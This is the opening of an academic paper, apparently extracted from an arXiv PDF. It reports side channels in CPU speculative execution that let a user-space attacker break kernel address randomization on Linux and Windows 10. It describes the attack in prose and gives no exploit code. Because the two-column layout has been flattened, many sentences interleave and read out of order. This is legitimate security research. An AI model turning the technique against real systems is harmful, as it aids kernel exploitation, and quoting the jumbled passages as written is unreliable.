Analyzing the Security Implications of Speculative Execution in Cpus

SPECULOSE: Analyzing the Security Implications of Speculative Execution in CPUs Giorgi Maisuradze Christian Rossow CISPA, Saarland University CISPA, Saarland University Saarland Informatics Campus Saarland Informatics Campus [email protected] [email protected] Abstract—Whenever modern CPUs encounter a conditional and follow the more likely branch target to continue execution. branch for which the condition cannot be evaluated yet, they Upon visiting a particular branch for the first time, CPUs use predict the likely branch target and speculatively execute code. static prediction, which usually guesses that backward jumps Such pipelining is key to optimizing runtime performance and is (common in loops to repeat the loop body) are taken, whereas incorporated in CPUs for more than 15 years. In this paper, forward jumps fall through (common in loops so as not to to the best of our knowledge, we are the first to study the abort the loop). Over time, the CPU will learn the likely inner workings and the security implications of such speculative execution. We revisit the assumption that speculatively executed branch target and then uses dynamic prediction to take the code leaves no traces in case it is not committed. We reveal several more likely target. When a CPU discovers that it mispredicted measurable side effects that allow adversaries to enumerate a branch, it will roll back the speculated instructions and mapped memory pages and to read arbitrary memory—all their results. Despite this risk of mispredictions, speculative using only speculated code that was never fully executed. To execution has significantly sped up CPU performance and is demonstrate the practicality of such attacks, we show how a part of most modern CPUs of popular vendors Intel, AMD or user-space adversary can probe for kernel pages to reliably break ARM-licensed productions. kernel-level ASLR in Linux in under three seconds and reduce the Windows 10 KASLR entropy by 18 bits in less than a second. To the best of our knowledge, we are the first to analyze the security implications of speculative execution. So far, the only known drawback of speculative execution is a slightly higher Disclaimer: This work on speculative execution was con- energy consumption due to non-committed instructions [27]. ducted independently from other research groups and was As we show, its drawbacks go far beyond reduced energy submitted to IEEE S&P ’17 in October 2017. Any techniques efficiency. Our analysis follows the observation that CPUs, and experiments presented in this paper predate the public when executing code speculatively, might leak data from disclosure of attacks that became known as Meltdown [25] the speculated execution branch, although this code would and Spectre [22] and that were released begin-January 2018. never have been executed in a non-speculative world. Ideally, speculated code should not change the CPU state unless it is I. INTRODUCTION committed at a later stage (e.g., because the predicted branch target was confirmed). We analyze how an adversary might Being at the core of any computer system, CPUs have undermine this assumption by causing measurable side effects always strived for maximum execution efficiency. Several during speculative execution. We find that at least two feedback hardware-based efforts have been undertaken to increase CPU channels exist to leak data from speculative execution, even if performance by higher clock frequencies, increasing the num- the speculated code, and thus its results, are never committed. ber of cores, or adding more cache levels. Orthogonal to Whereas one side channel uses our observation that speculated such developments, vendors have long invested in logical code can change cache states, the other side channel observes arXiv:1801.04084v1 [cs.CR] 12 Jan 2018 optimization techniques, such as complex cache eviction al- differences in the time it takes to flush the instruction pipeline. gorithms, branch predictors or instruction reordering. These developments made clear that CPUs do not represent hardware- With these techniques at hand, we then analyze the se- only components any longer. Yet our level of understanding curity implications of the possibility to leak data from within of the algorithmic, i.e., software-side aspects of CPUs is in its speculative execution. We first show how a user-space attacker infancy. Given that many CPU design details remain corporate can abuse speculative execution to reliably read arbitrary user- secrets, it requires tedious reverse engineering attempts to space memory. While this sounds boring at first, we then also understand the inner workings of CPUs [23]. discuss how that might help an attacker to access memory regions that are guarded by conditionals, such as in sandboxes. In this paper, we argue that this is a necessary direction We then analyze if an unprivileged user can use speculation of research and investigate the security implications of one of to read even kernel memory. We show that this attack is the core logical optimization techniques that is ubiquitous in fortunately not possible. That is, speculative execution protects modern CPUs: speculative execution. Whenever facing a con- against invalid reads in that the results of access-violating reads ditional branch for which the outcome is not yet known, instead (e.g., from user to kernel) are zeroed. of waiting (stalling), CPUs usually speculate one of the branch target. This way, CPUs can still fully leverage their instruction This observation, however, leads us to discover a severe pipelines. They predict the outcome of conditional branches side channel that allows one to distinguish between mapped and unmapped kernel pages. In stark contrast to access- attacks that are possible in the absence of KASLR. Later, in violating memory reads (which are zeroed), page faults (i.e., Section IV, we will combine branch prediction and speculative accesses to non-mapped kernel pages) stall the speculative execution to anticipate the speculatively executed path after a execution. We show that an attacker can use this distinction conditional branch. This will be a key to executing arbitrary to reliably and efficiently determine whether a virtual memory code speculatively, which we will use in our attack to remove page is mapped. This effectively undermines a fundamental the randomness introduced by KASLR. assumption of kernel-based Address Space Layout Randomiza- tion (KASLR) designs [10] present in modern OSes (Windows 8.x+, Linux kernel 4.4+, iOS 4.3+, Android 8.x): KASLR’s A. Generic x86 architecture foremost goal is to hide the location of the kernel image, Despite being a CISC (Complex Instruction Set Comput- which is easily broken with speculative execution. Access ing) architecture, x861 constitutes the prevalent architecture violations in speculative execution—in contrast to violations used for desktop and server environments. Extensive optimiza- in non-speculated execution—do not cause program crashes tions are among the reasons for x86’s popularity. due to segmentation faults, allowing one to easily repeat checks in multiple memory ranges. In our experiments, we Realizing the benefits of RISC (Reduced Instruction Set use commodity hardware to show that one can reliably break Computing) architectures, both Intel and AMD have switched KASLR on Ubuntu 16.04 with kernel 4.13.0 in less than three to RISC-like architecture under the hood. That is, although seconds. still providing a complex instruction set to programmers, internally they are translated into sequences of simpler RISC- In this paper, we provide the following contributions: like instructions. These high-level and low-level instructions are usually called macro-OPs and micro-OPs, respectively. • To the best of our knowledge, we are the first to explore This construction brings all the benefits of RISC architecture the internals of speculative execution in modern CPUs. and allows for simpler constructions and better optimizations, We reveal details of branch predictors and speculative ex- while programmers can still use a rich CISC instruction set. ecution in general. Furthermore, we propose two feedback An example of translating macro-OP into micro-OP is shown channels that allow us to transfer data from speculation in the following: to normal execution. We evaluate these primitives on five Intel CPU architectures, ranging from models from 2004 1 load t1,[rax] to recent CPU architectures such as Intel Skylake. 2 add [rax], 1 => add t1, 1 • Based on these new primitives, we discuss potential 3 store[ rax], t1 security implications of speculative execution. We first present how to read arbitrary user-mode memory from Using micro-OPs requires way less circuitry in the CPU for inside speculative execution, which may be useful to read their implementation. For example, similar micro-OPs can be beyond software-enforced memory boundaries. We then grouped together into execution units (also called ports). Such extend this scheme to a (failed) attempt to read arbitrary ports allow micro-OPs from different groups to be executed kernel memory from user space. in parallel, given that one does not depend on the results of • We discover a severe side channel in Intel’s speculative another. The following is an example that can trivially be run execution engine that allows us to distinguish between a in parallel once converted into micro-OPs: mapped and a non-mapped kernel page. We show how we can leverage this concept to break KASLR implementa- 1 mov [rax], 1 tions of modern operating systems, prototyping it against 2 add rbx, 2 the Linux kernel 4.13 and Windows 10. • We discuss potential countermeasures against security degradation caused by speculative execution, ranging Both instructions can be executed in parallel. Whereas instruc- from hardware- and software- to compiler-assisted at- tion #1 is executed in the CPU’s memory unit, instruction #2 tempts to fix the discovered weaknesses. is computed in the CPU’s Arithmetic Logic Unit (ALU)— effectively increasing the throughput of the CPU.

Load more